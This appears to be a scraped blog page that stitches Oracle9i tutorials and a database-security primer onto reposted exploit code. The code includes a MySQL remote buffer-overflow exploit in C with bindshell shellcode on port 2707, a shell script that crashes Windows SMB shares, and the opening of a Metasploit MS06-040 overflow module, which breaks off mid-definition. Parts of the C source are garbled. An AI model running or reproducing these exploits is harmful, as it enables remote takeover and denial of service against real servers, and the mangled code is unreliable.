The ALTER SESSION ENABLE RESUMABLE statement is used to activate resumable space allocation for a given session. Developers are able to embed the ALTER SESSION statement in programs to activate resumable space allocation. A new parameter, called RESUMABLE, is used to enable resumable space allocation for export, import and load utilities.

Statements do not suspend for an unlimited amount of time. A timed interval can be specified in the ALTER SESSION statement to designate the amount of time that passes before the statement wakes up and returns a hard return code to the user and rolls back the unit of work.

If no time interval is specified, the default time interval of two hours is used.
When a resumable statement suspends because of an out of space condition, the following actions occur:
A triggerable system event is initiated. Developers are able to code triggers that fire when a statement suspends.
Entries are placed into system data dictionary tables. The data dictionary views DBA_RESUMABLE and USER_RESUMABLE can be accessed to retrieve the paused statement's identifier, text, status and error message.
Messages are written to the alert log identifying the statement and the error that caused the statement to suspend.
Flashback Query

How many times have database recoveries been performed because of incorrect changes made to database data? Were your users ever unsure of the damage? There are times when a simple before change and after change comparison was all that was needed. If the damage was limited, a simple update may have been able to correct the problem. A process that is much less painless than a database restore.

Oracle9i's flashback query provides users with the capability of viewing data in the past. Oracle describes this new feature as "Oracle Invents the Time Machine" in many of its advertisements. It may not be a time machine, but it does allow data to be viewed in the past and it is easy to use. I must admit, I thought "It sounds too good. It has to be hard to use or not be reliable." I was wrong on both counts.

To take advantage of flashback queries, the database must use system managed undo segments. If flashback query is to be used, the administrator is tasked with determining how much of the old data should be kept available. The undo tablespace must be sized to hold the desired amount of undo data. Oracle documentation provides calculations that use update frequency and the amount of data being changed to estimate the required size of the undo tablespace.

The configuration parameter UNDO_RETENTION which specifies the amount of time that Oracle attempts to keep undo data available plays an important role in flashback query. Although Oracle documentation recommends flashback query for applications that want to view data in the past, it is important to understand that the UNDO_RETENTION parameter does not force Oracle to keep the old data in the undo tablespace. Depending on the available disk storage allocated to the undo tablespace, the database might not always be able to keep all of the requested undo data available. Providing active transactions with undo image space takes precedence over flashback query requirements. As a result, applications should not be designed to depend on the availability of historical data retrieved from undo segments.

The system supplied package DBMS_FLASHBACK is used to provide flashback query capabilities. Standard date and time SQL functions can be used to determine the time in the past the data will be retrieved from. Here is an example that goes back five minutes:
EXECUTE DBMS_FLASHBACK.ENABLE_AT_TIME (SYSDATE - (5/(24*60)));

The above statement sends the session five minutes back in time for the duration of that session or until the EXECUTE DBMS_FLASHBACK.DISABLE is executed. Oracle recommends that the session not be ended without executing the FLASHBACK.DISABLE procedure. I have seen a few sessions ended without executing FLASHBACK.DISABLE without any detrimental affects. It is better to be safe than sorry, so the recommendation is to always execute FLASHBACK.DISABLE before ending the session.

Currently, flashback query is able to provide 5 days (uptime not wallclock) worth of data using the date and time parameter. To query data older than this, you must specify an SCN rather than a date and time.

Two important points to remember when using flashback query:
The current data dictionary is used. If DDL changes have been made to the table between the time stated in the flashback query and the current point in time, an error will be returned.
Data can not be updated during a flashback query enabled session. To save historical data, the old data can be placed into a cursor. The contents of the cursor can be dumped into a work table after the FLASHBACK.DISABLE procedure is executed.

Remember, although flashback query is promising to be a beneficial feature in Oracle9i, it is not a panacea. Applications should not be designed to depend upon flashback query data. In addition, although it may prevent an occasional database recovery, it must be used cautiously. If data has been changed incorrectly, administrators must determine if other transactions have used that incorrect data as input. If the transactions using incorrect data as input have also made data changes, bad data is now being propagated throughout the database. It may be safer to perform a database recovery to a previous point in time.

In our next discussion of Oracle9I, we'll discuss external tables, tablespace changes, Oracle managed files, multiple block sizes and cache configuration, list partitioning, on-line index table and index reorganization and index monitoring.

See you in class!

Christopher Foot has been involved in database management for over 18 years, serving as a database administrator, database architect, trainer, speaker, and writer. Currently, Chris is employed as a Senior Database Architect at RemoteDBA Experts, a remote database services provider. Chris is the author of over forty articles for a variety of magazines and is a frequent lecturer on the database circuit having given over a dozen speeches to local, national and international Oracle User Groups. His book titled OCP Instructors Guide for DBA Certification, can be found at http://www.dba-oracle.com/bp/bp_book14_OCP.htm.

Database Security Primer

2006-09-11T19:26:00.000+07:00

An Enterprise Database Security Primer

For many system administrators, the terms “open systems” and “security” can seem impossibly opposite. Maintaining security for a centralized database system is difficult enough, and when faced with a network of networked databases, maintaining a level of access and update security is a formidable challenge. Security is often an afterthought, and the database industry is plagued with sub-standard security, especially for enterprise databases that are cobbled-together as a result of external factors such as corporate acquisitions.
There are many problems with security for enterprise databases, far more than the IT industry would care to acknowledge. These security exposures stem from the following architectural issues:
Multiple entry points — Unlike a traditional centralized database, web-based databases have many entry points. These entry points include web servers, VPN access, app server access and access to databases via web portal protocols. When dealing with literally hundreds of entry points, special care needs to be taken to insure that harmful viruses are not introduced into the system.
Weakest link problem — The recent publicity regarding security holes in enterprise security underscores the weakest link problem. When dealing with such a wide variety of entry points and platforms, the overall system security is only as secure as the weakest link in the federation. No matter how much care is taken to insure security at the database level, problems can still be introduced from a variety of other sources. For example, once a hack get root access to a web server, it is often easy to gain access to the database server, especially when remote shell capability is enabled.
Web-based databases — Databases that are configured to allow external communications from other web portals face an exceptional data security challenge. Hackers can constantly attempt to hack into web portals, eventually locating a weakness in the Net Services architecture.
When we speak of security, we must define the scope of security. Security means different things to different managers, and we must clearly define the scope of security.
Server access security
Internet access security
Database access security
Data privacy security
While few security systems are perfect (the exception being the retinal eyeball scanners used by the U.S. Department of Defense for top-secret systems), there are some things that can be done to decease the likelihood of a security breach. Many of these methods are time-consuming and slow down the runtime system, so careful thought must be given to these solutions before implementing them in a production environment. Let’s explore each of these areas and see some common security problems.
Server Access Security

Server access security refers to preventing unwanted access to the server environment and ensuring controlled access to the IT staff. There are several technologies that are employed to assist with external server access:
Kerberos security — This popular “ticket”-based authentication system provides password-based server access authentication.
Authentication servers (Radius servers) — Secure authentication servers provide positive identification for external users.
Password security consolidation — Many vendors offer tools to consolidate passwords among dozens of servers.

Obviously, all security must start at the server level. The IT manager must provide reliable access methods for IT staff members while ensuring that the database is not open to external threats. Let’s start by looking at internal server access tools:
Call-back access — Using this technique, the IT staff member calls a phone number, enters a password, and the server calls them, thereby ensuring that access is always with pre-defined phone numbers.
Time-based access cards — This scheme is commonly used by banking institutions and classified government systems. A credit-card-sized timer is given to each IT employee that generates a new password every 60 seconds. The card is synchronized with a server-side password change routine.
VPN access — Using Virtual Private Networks, IT staff members can gain access to a server using secure shell (ssh) protocols.

However, even all of these precautions do not always prevent un-wanted hacker access, especially for web-enabled databases. There are many ways that a malicious programmer can bypass the security of a database. The media is full of reports of adolescent hackers who have breached top-secret systems, and even the major database vendors have been plagued with bugs that allow external hackers access to web servers and app servers. While there are new approaches to breaking into systems being developed constantly, there are some general categories of methods.

There are a large variety of vendors that offer tools to manage internal IT security. Listing 1 shows an alphabetical sample of the major security vendors. As we can see, there is a huge amount of choice in security software.
AuthAPI (Entact Information Security)
Cicso Secure Policy Manager (Cisco Systems)
Control-SA (BMC Software)
Control-SA/Links (BMC Software)
Enterprise Security Administration (Computer Associates)
Enterprise Security Manager (Axent Technologies)
Lucent Security Management Server (Lucent Technologies)
OpenEdition DCE Security Server (IBM)
Open e-Security Platform (e-Security)
PassGo CUA (Axent Technologies)
ProtectIT (Computer Associates)
Resource Manager for UNIX (Axent Technologies)
SecureWay Policy Director (IBM)
Tivoli Security Management (Tivoli)
Unicenter TNG (Computer Associates)
VACMAN Radius Server (Vasco Data Security)

Listing 1: A list of IT security vendors.
Internal Passwords and Database Security

In an open system environment, system access is controlled at the network sign-on level, the individual work station, each database within the federation, as well as each application.

If possible, servers should not be accessible over the Internet unless network and systems administrators have followed the general guidelines for authenticated external access. Some companies use domain servers to restrict server access to specified users. However, hackers still might intercept user IDs and passwords. To prevent this, many companies employ tools that utilize secure shell (ssh) technologies to encrypt external Internet communications. The most popular of these tools is SecureCRT, which gives authorized users Internet access to servers without the fear of someone capturing the user ID and password.

Secure shell tools use sophisticated Huffman cryptography techniques for Internet transmissions; these products are more secure even than the Enigma code that was used during World War II. However, such superb encryption sometimes lulls IT staffs into believing that they are protected from external attack. Remember, the bulk of the security is at the server firewall, not on the Internet.

There has been a great debate about the effectiveness of requiring frequent password changes. Advocates argue that it reduces the likelihood that the user will use easily guessed names. Those against enforced password changes point out that the frequent changes may be seen as obtrusive by the end-user and also require the forgetful end-user to write down their current password. With so many possible ports of entry, effective ID management can be quite difficult. Invariably, all of the password control mechanisms have significant problems:
Password-changing routines — Many shops have discovered that when a user is forced to provide multiple passwords for each component in an enterprise database, they commonly compromise system security by choosing passwords that are cyclic in nature. For example, a user may rotate between the passwords “north,” “south,” “east,” and “west” in order to avoid having to keep track of the multiple sign-on’s to all of the system components. More sophisticated password devises require the end-user to specify passwords of a minimum length (greater than five characters), prohibit the re-use of passwords, and require that the passwords are changed on a periodic basis. One approach that has been especially effective is to link the password-changing software with the user’s personnel records so that the names of family members, street addresses, and other easily guessed information may not be included in the password.
Automatic account disabling — If you suspend the server ID after three password attempts, attackers are thwarted. Without user ID suspension, an attacker can run a program that generates millions of passwords until it guesses the user ID and password combination.
Random password generators — This is one of the most problematic mechanisms of all, and virtually guarantees that your staff will have written lists of passwords. For example, consider the following screen (refer to ).

Figure 1: An ineffective random password generator.

Without a centralized security component, the end-users are forced to write down all of these passwords to each system component in order to manage the complexity of remembering all of the passwords. While this strategy is a tremendous headache for the end users, it does ensure that system-wide security is not jeopardized through a single breach. In system-wide security environments, security tables are kept which allow the end user to specify their user ID and sign-on once, and the security subsystem automatically manages their access to networks, operating systems, databases and applications.

There are two basic approaches to password security. The first and most common approach utilizes a common security system (refer to Figure 2). This security system maintains a single password, and controls access to all of the system components. This idea has been borrowed from ancient mainframe systems such as RACF and ACF2.

Figure 2: Internal Password propagation.

While this is a great simplification for the end user of the system, it also increases the risk that a breach to the system-wide security could have widespread ramifications. One downside to this approach is that a failure on the processor that contains the propagation routine could conceivably lock up the entire enterprise. Another potential problem with centralized security is the possibility that a user might de-encrypt a password on one component, thereby gaining access to the entire federation.

Another method for controlling security is to make each of the distributed systems components access the security tables directly (refer to Figure 3). This eliminates the exposure of having redundant passwords stored in each processor and provides a simple point of control for the entire federation.

Figure 3: Centralized password security.

This approach requires user-exits to be installed at the level of each sign-on, at the network, operating system, and database level. The security files of each component continue to exist, but the password fields contain random, unchanging values. While it is nice to have a single point with which to control security, there is also the possibility that a failure on the security system would block access to the entire federation. To alleviate this potential exposure, security tables are stored redundantly on two processors, and a failure on one processor will trigger the security mechanism to check the other processor. Security at each level of the system is still maintained because each individual security component is still active, with random passwords that are never actually used for signing on to the component.
Auditing External Security

With such complexity, many IT managers employ security experts and professional white-hat hackers to ensure that their security is bullet-proof. Such checks usually involve the following areas:
Firewall security assessment
Enforcement of Network security policies
Router security checks
Review of Kerberos and remote authentication servers
Review of network security policies
Review of UNIX vendor security updates
Password strength checking
Use of UNIX shadow passwords
Checking for improper rhosts connectivity
Checking sticky bits for exposures

Of course, security is for more than internal IT staff. You must also provide access over the web to end users from all over the world. Let’s explore this issue.
Web-based Access Security

Today’s Web architectures include four layers of servers: Web listeners, Web servers, application servers, and database servers. Each of these layers is vulnerable to hacks.
Figure 4: A four-tiered eCommerce architecture (courtesy Builder.com).

In general, security concerns over Internet access are similar to security issues in an internal network. To understand the similarity, let’s examine the entry points for hackers and demonstrate some techniques that attackers use to gain access to confidential data. All Web-based applications have numerous possible entry points, and security must be enforced at each level. Hackers look at the following areas when they try to break into a Web application.
Internet access — If hackers can guess the IP address of a server, they can telnet to the server and get a login prompt. At this point, all they need is a user ID and password to gain access to the server.
Port access — All Web applications are configured to listen on a predefined port for incoming connections, and they generally use a listener daemon process to poll for connections.
Server access — A four-tiered Web application incorporates a series of Web servers, application servers, and database servers. Each of these servers presents a potential point of entry, and if remote shell (rsh) access is enabled, a hacker that gets access to a single database may get access to many servers.
Network access — OracleNet, as an example, allows for incoming connect strings to the Oracle listener process. If hackers know the port, IP address, Oracle ID, and password, they can gain direct access to the database.

After you identify possible attack points, you must restrict access to those points. Disabling external entry can be accomplished though several methods. Next, let’s examine web-based security access.

Ecommerce security is especially important for Web-based databases where hackers can gain complete control of the environment. Many managers are justifiably concerned about opening up mission-critical applications to the Internet. With dozens of potential entry points and almost daily news about large companies being hacked, proper database security is critical.
Web port access security — All applications are directed to listen at a specific port number on the server. Like any standard HTTP server, the Web Listener can be configured to restrict access.
XML-based access security — The latest trend among web-enabled database is in the area of Web services, specifically the inter-communications between databases over the Internet. We have the Microsoft .NET initiative and web service tools offering to assist in managing security between web portals. Most of these use XML security to verify communications across an insecure network.

Internet hackers are constantly searching for servers to attack. To do this, the hackers write simple scripts that randomly generate and ping IP addresses, looking for servers that respond with an “ack.” The response is called a “ping acknowledgment” and is a standard feature of the TCP/IP ping utility. For example, here we ping the IP address for a major eCommerce database web server:
C:\ ping 172.234.33.101

Here’s the output:
Pinging 172.234.33.101 with 32 bytes of data:
Reply from 172.234.33.101: bytes=32 time=164ms TTL=254
Reply from 172.234.33.101: bytes=32 time=162ms TTL=254
Reply from 172.234.33.101: bytes=32 time=170ms TTL=254
Ping statistics for 172.234.33.101:
Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:

Minimum = 162ms, Maximum = 170ms, Average = 165ms

The acknowledgment packet tells the hacker that there’s an active server at this IP address. Next, the hacker simply uses the telnet utility to go to the server and begins a series of attempts to hack the root or the Oracle user password. The best way to foil this type of attack is to disable all server accounts after three password attempts.

Below you’ll find the pseudocode for a UNIX shell script to cruise the Internet for vulnerable servers. I have deliberately obfuscated the actual code as a courtesy, but this script should give you the idea. Hackers run such scripts as daemon processes and they can scan hundreds of thousands of IP addresses every hour. Please note that I have deliberately introduced syntax errors into the pseudocode routine to prevent its being used by any potential hackers.
/*#/bin/ksh
while true
do
#****************************************************
# Generate a random IP address
#****************************************************
$IP_ADDRESS=rnd(1-255).rnd(1-255).rnd(1-255).rnd(1-255)
#****************************************************
# Submit the IP address to the ping command
#****************************************************
nohup ping $IP_ADDRESS > /tmp/t.lst 2>&1 &
#****************************************************
# If ping is responding - start the attack
#****************************************************
if `cat /tmp/t.lst|wc -l` > 0 then invoke attack_routine
fi
done

Even a novice computer user can write an attack program and locate server attack opportunities, and the average 12-year-old knows the fundamentals of a denial of service (DOS) attack. Although the main method of attack is directly from the IP address, some creative hackers gain entry with I/O-enabled Java applets or programs that compromise cookie-writing. To prevent these types of external attacks, savvy companies employ some of the following techniques:
Use trusted IP addresses — UNIX servers are configured to answer only pings from a list of known and trusted IP addresses. In UNIX, this is accomplished by configuring the rhosts file, which restricts server access to a list of specific users.
Special tools — Products such as Zone Alarm send an alert when an external server is attempting to breach your firewall security.

Let’s drill down deeper and explore database security.
Database Access Security

Database access security refers to the access controls placed upon the end users of the database. Database access security is generally customized at the database level through a variety of methods:
Internal role-based security — Specific object-level and system-level privileges are grouped into roles and granted to specific database users. Object privileges can be grouped into roles, which can then be assigned to specific users.
Grant-execute security — Execution privileges against database procedures can be tightly coupled to specific users. When a user executes the procedures, they gain database access, but only within the scope of the procedure. Users are granted execute privileges on functions and stored procedures. The grantee takes on the authority of procedure owner when executing the procedures, but has no access outside the procedure.
Application-level security — This type of access control is popular with ERP solutions such as Oracle Applications and SAP. With application level security, the app servers establish pre-spawned connections to the database, and the app server manages connectivity to the database layer.
Data Privacy Security — Data privacy security is the offshoot of stringent US privacy laws such as HIPAA. Under US HIPAA rules, all database access must be tracked and complete audits must be made of all updates and retrieval of sensitive information. There are a variety of techniques used for this challenge.
Update auditing — Many database managers use the database recovery logs (redo logs) as an audit trail for database updates. The database logs record every change to the database and information about who made the change. Examples of such tolls are Oracle LogMiner and BMC’s SQL-Backtrack.
Schema change auditing — Many databases provide methods for tracking every change to a database schema using system-level DML triggers. Here is a link to DBAZine article on DML tracking for Oracle.
Virtual private databases — VPD technology can restrict access to selected rows of tables. Virtual Private Databases (fine-grained access control) allows for the creation of policies that restricts table and row access at runtime.

Many companies are developing security systems that tie security to the data that feed the enterprise applications, rather than the applications themselves. This data-level approach ensures that the database controls access to the data and eliminates the possibility that someone may bypass the application and the security.
Conclusion

Database security has become a very critical task, and the MBO goals of many IT managers require that they lock-down security at the server level, web level and database level. However, with a plethora of choices, the IT manager must make a decision regarding the best security techniques and tools that will be cost-effective and also provide the desired levels of security.

In our next installment, we will examine the Oracle9i suite of security tools and look at how they are used in Oracle environments to ensure proper database security and access control.

--

Donald K. Burleson is one of the world’s top Oracle Database experts with more than 20 years of full-time DBA experience. He specializes in creating database architectures for very large online databases and he has worked with some of the world’s most powerful and complex systems. A former Adjunct Professor, Don Burleson has written 15 books, published more than 100 articles in national magazines, serves as Editor-in-Chief of Oracle Internals and edits for Rampant TechPress. Don is a popular lecturer and teacher and is a frequent speaker at Oracle Openworld and other international database conferences. Don’s Web sites include DBA-Oracle, Remote-DBA, Oracle-training, remote support and remote DB

MySql Memory Leak & MySql remote

2006-09-11T14:46:00.000+07:00

April 21.st 2006

my_exploit.c

MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f

MySql <= 5.0.20 MySql COM_TABLE_DUMP Memory Leak MySql <= 4.x.x copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) GPL 2.0 **************************************************************** Disclaimer: In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. **************************************************************** compile with: gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit Then: my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x] -H: this Help; -i: Information leak exploit (shows the content of MySql Server Memory) -x: shows c/s communication output in hexadecimal -t: hexadecimal table_list struct address (by default we try to find it automatically) -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338) -u: mysql username (anonymous too ;) -p: mysql userpass (if you need it) -s: the socket path if is a unix socket -h: hostname or IP address -P: port (default 3306) Example_1 - Memoryleak: my_exploit -s socketpath -u username -i Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468 For memory leak: my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]] For the bindshell to port 2707 my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] [-s socket|[-h hostname [-P port]]] then from another shell: nc 127.0.0.1 2707 id uid=78(mysql) gid=78(mysql) groups=78(mysql) */ #include
#include
#include

// we need to know the thread struct address pointer and the table_list.
// these are defaults, change them from command line.
int thd = 0x8b1b338;
int tbl = 0x8b3a880;

#define USOCK2 "/tmp/mysql.sock"

char addr_tdh[4];
char addr_tbl[4];
char addr_ret[4];

// constants to overwrite packet with addresses for table_list thread and our shell.
#define TBL_POS 182
#define THD_POS 178
#define RET_POS 174
#define SHL_POS 34

// bindshell spawns a shell with on port 2707
char shcode[] = {
0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 // 12
,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1
,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80
,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0
,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80
,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f
,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 // 12*7= 84
};

int tmp_idx = 0;

int dump_packet_len = 7;
char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };

int payload_len = 371;
// header packet + select '1234567890...etc'
char query_payload[] = {
0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33 // 16 Some junk from position 6 ...
, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36 // 32
, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39 // 48
, 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34 // 64
, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32 // 72
, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35 // 88
, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38 // 94
, 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a // 112
, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118
, 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d // 144
, 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63 // 160
, 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176
, 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75 // 192 178
, 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 208
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 224
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 240
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 256
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 272
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 288
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d //
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d //
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d //
, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d //
, 0x3d, 0x3d, 0x27
}; // 16*23+3 = 371

static int s = 0, c = 0;
int fd = 0;
int d = 1;
int hexdump = 0;
char buf[65535];

MYSQL *conn; /* pointer to connection handler */

int
sendit (char *buf1, int fdest, int dblen)
{
int len1;
int i = 0;
int ret = 0;
printf ("%d\n", d);
if (d == 2)
{
// let's prepare the query packet
int o;
int position = 14;

tmp_idx = 3;

int ret = tbl - 0x106 + 33;

for (i = 0; i <>> i) & 0xff;

tmp_idx = 3;
for (i = 0; i <>> i) & 0xff;

tmp_idx = 3;
for (i = 0; i <>> i) & 0xff;
printf ("ret %x\n", ret);

#if 1
tmp_idx = 0;
for (o = THD_POS; o > THD_POS - 4; o--)
query_payload[o] = addr_tdh[tmp_idx++];

tmp_idx = 0;
for (o = TBL_POS; o > TBL_POS - 4; o--)
query_payload[o] = addr_tbl[tmp_idx++];

tmp_idx = 0;
for (o = RET_POS; o > RET_POS - 4; o--)
query_payload[o] = addr_ret[tmp_idx++];
#else
for (; position < tmp_idx =" 0;" o =" position"> position; o--)
query_payload[o] = addr_ret[tmp_idx++];

tmp_idx = 0;
for (o = position + 8; o > position + 4; o--)
query_payload[o] = addr_tdh[tmp_idx++];

tmp_idx = 0;
for (o = position + 12; o > position + 8; o--)
query_payload[o] = addr_tbl[tmp_idx++];

}

#endif

tmp_idx = 0;
for (o = SHL_POS; o < buf1 =" query_payload;" len1 =" payload_len;">= 3)
{
printf ("entro\n");

// prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_TABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=0x73)
buf1 = table_dump_packet;
if (dblen >= 0)
buf1[5] = (char) dblen;
printf ("%x", (char) dblen);
len1 = dump_packet_len;
}
d++;

printf ("\nClient -> Server\n");
if (hexdump)
{
for (i = 0; i < i =" 0;" f =" (unsigned" fdest =" fd;" ret =" recv"> Client\n");
if (hexdump)
{
for (i = 0; i < i =" 0;" f =" (unsigned" ret=" send(c," thd="0x8b1b338)\n\" fdest =" 0;" port =" 3306;" shell =" 1;" force_table =" 0;" user =" NULL;" pass =" NULL;" host =" NULL;" socket =" strdup" opterr =" 0;" c =" getopt" socket =" (char" force_table =" 1;" tbl =" (int)" tbl="atoi(" thd =" (int)" user =" (char" pass =" (char" port =" atoi" host =" (char" shell =" 0;" hexdump =" 1;" tbl =" thd" conn =" mysql_init" ret =" mysql_real_connect" fd =" conn-">net.fd;

if (shell)
{
d = 2;
sendit (buf1, fdest, -1);
d = 3;
sendit (buf1, fdest, -1);
d = 3;
sendit (buf1, fdest, -1);
}
else
{
int l;
d = 3;
for (l = 0; l <> {
sendit (buf1, fdest, l);
}
}
mysql_close (conn);

exit (0);
}

// milw0rm.com [2006-05-02]

Winblast WinXP & Win2003

2006-09-11T14:33:00.000+07:00

#!/bin/sh
# winblast v3 - DoS on WinXP, Win2003Srv
# 2003-12-04 Steve Ladjabi
#
# I've encountered a strange problem mounting a Windows server share.
# My setup: Debian Linux, smbmount 3.0.0beta2 and Windows 2003 Server.
#
# When the client creates and deletes a lot of files on the server, the
# server suddenly ceases serving, i.e. you can not access files nor list
# directory contents any more.
# Example:
# knoppix:/mnt # ll /mnt/test
# ls: /mnt/test: Cannot allocate memory
#
# The only way to get the server working again is to reboot it. Rebooting
# the client does not help.
#
# If you want to try for yourself, check this shell script. The script will
# create 1000 directories and then takes turns deleting and re-creating
# them. There will be no more than those 1000 directories at any time.
# After having created (and deleted) 3.5 millions directories the server
# denies access to the share.

count=0

# using 'pathcount' directories
pathcount=1000

echo running \'winblast v3\' with $pathcount files in loop ...

while [ 1 ]; do
p=$((pathcount*2-1))
stop=$((pathcount-1))
while [ "$p" != "$stop" ]; do
dirname=wbst$p
# delete old directory if it exists and exit on any error
if [ -d $dirname ]; then
rmdir $dirname || exit 3
fi;

# generating directory and exit on any error
mkdir $dirname || exit 1
p=$((p-1))
count=$((count+1))
done;
echo $count directories generated ...
done;
#-- end --

# milw0rm.com [2004-01-25]

Windows Netplsremote Exploite

2006-09-11T14:26:00.000+07:00

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::netapi_ms06_040;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
'FragSize' => [ 256, 'The DCERPC fragment size' ],
'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],
'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],
};

my $info = {
'Name' => 'Microsoft NetpIsRemote() MSO6-040 Overflow',
'Version' => '$Revision: 3715 $',
'Authors' =>
[
'H D Moore ',
],

'Arch' => ['x86'],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'thread' },

'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The target address' ],

# SMB connection options
'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
},

'Payload' =>
{
# Technically we can use more space than this, but by limiting it
# to 370 bytes we can use the same request for all Windows SPs.
'Space' => 370,

'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'Keys' => ['+ws2ord'],

# sub esp, 4097 + inc esp makes stack happy
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},

'Description' => Pex::Text::Freeform(
qq{
